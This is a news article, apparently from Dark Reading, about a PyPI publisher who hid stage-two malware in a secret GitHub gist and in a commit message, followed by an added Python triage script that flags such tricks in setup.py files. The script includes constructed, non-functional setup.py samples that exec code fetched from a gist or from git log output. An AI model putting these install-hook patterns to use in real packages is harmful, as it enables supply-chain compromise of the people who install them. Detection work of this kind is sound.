Researchers have come across a GitHub account abusing two unique features of the site to host stage-two malware.
Hackers have increasingly been repurposing public services as headquarters for their misdeeds - housing malware in public code repositories or file-sharing services, and performing command-and-control from messaging apps.
Sometimes they get even more creative, utilizing software-as-a-service platforms in ways you'd never be able to guess.
Continuing this tradition is yeremyvalidslov2342, an individual connected with multiple malicious packages identified by ReversingLabs on Dec. 19.
New Ways of Abusing GitHub for Cyber Gain
The most common way cybercriminals abuse public code repositories is by simply publishing their malicious files to throwaway accounts.
It's obvious yet crude, as administrators work to identify and take down such accounts as soon as they're spotted.
Yeremy took a more circuitous approach, first publishing a series of packages to the Python Package Index, another oft-abused repo.
Gists are a lightweight form of Git repository, designed to let coders store and share snippets of code without having to set up entire projects around them.
The secret gist referenced from inside the PyPI packages contained the stage-two malware.
The researchers were only able to find one other use of gists for such a purpose, buried in a 2019 Trend Micro report about a Slack backdoor.
Yeremy was also connected to one other PyPI package with a malicious setup file.
This time, upon execution, the package cloned an existing (and most likely legitimate) PySocks project from GitHub.
In this case the malware was not within the repository's contents at all; it was hidden inside the commit message describing it.
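As an added illustration, not tooling from ReversingLabs or the article, the following static triage scans a package's setup.py for the two hosting tricks described above: a reference to a GitHub gist, or a git clone followed by a read of commit history, combined with dynamic execution of what was fetched. The setup.py samples are constructed and deliberately non-functional (placeholder URLs, undefined helpers), and the decoder names and the block/review rule are assumptions, since the article does not say how the payloads were encoded.

```python
import ast

GIST_HOST = "gist.github.com"
DECODERS = {"b64decode", "decodebytes", "unhexlify"}  # assumed; encoding not stated in the article
SHELL_CALLS = {"run", "Popen", "call", "check_output", "check_call", "system", "popen"}

def _callee(call):
    f = call.func
    return f.id if isinstance(f, ast.Name) else getattr(f, "attr", "")

def _strings(node):
    return [n.value for n in ast.walk(node) if isinstance(n, ast.Constant) and isinstance(n.value, str)]

def triage_setup_py(source):
    """Return the set of indicator names found in the setup.py source text."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str) and GIST_HOST in node.value:
            found.add("gist_reference")          # stage two hosted in a gist
        if not isinstance(node, ast.Call):
            continue
        name = _callee(node)
        if name in ("exec", "eval") and node.args and not isinstance(node.args[0], ast.Constant):
            found.add("dynamic_exec")            # runs code the package did not ship with
        elif name in DECODERS:
            found.add("decoder")
        elif name in SHELL_CALLS:
            words = {w for s in _strings(node) for w in s.split()}
            if {"git", "clone"} <= words:
                found.add("git_clone")           # pulls a repository at install time
            if {"git", "log"} <= words:
                found.add("git_log_read")        # reads commit messages
    return found

def verdict(indicators):
    """Assumed rule: block when code is executed from a gist or from commit history."""
    if "dynamic_exec" in indicators and indicators & {"gist_reference", "git_log_read"}:
        return "block"
    return "review" if indicators else "clean"

# Constructed, deliberately non-functional setup.py samples (placeholder URLs, undefined helpers).
BENIGN = 'from setuptools import setup\nsetup(name="demo", version="1.0")\n'
GIST_STAGE2 = ('SRC = "https://gist.github.com/EXAMPLE-USER/EXAMPLE-ID"\n'
               'exec(fetch(SRC))\n')
COMMIT_MSG = ('import subprocess\n'
              'subprocess.run(["git", "clone", "https://github.com/EXAMPLE/EXAMPLE", "p"])\n'
              'msg = subprocess.check_output(["git", "-C", "p", "log", "-1"])\n'
              'exec(decode(msg))\n')
```

Run `verdict(triage_setup_py(text))` over each setup.py pulled from a package feed; the indicator set, not just the verdict, is what an analyst would want in the alert.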
How Public Services Help Hackers
Carrying out cyberattacks from one's own infrastructure does offer a certain degree of resiliency against account takedowns, but using shared and open source resources has the advantage of stealth.
Public software services also offer a host of extra upsides for bad guys.
It's quicker, easier, and cheaper to create an account on a popular website than it is to arrange traditional infrastructure.
The company supporting the site handles maintenance and uptime, and they're typically very reliable.
Traffic to popular sites elicits far less suspicion than does traffic to unknown servers in far-off countries.
This Cyber News was published on www.darkreading.com. Publication date: Tue, 19 Dec 2023 12:30:19 +0000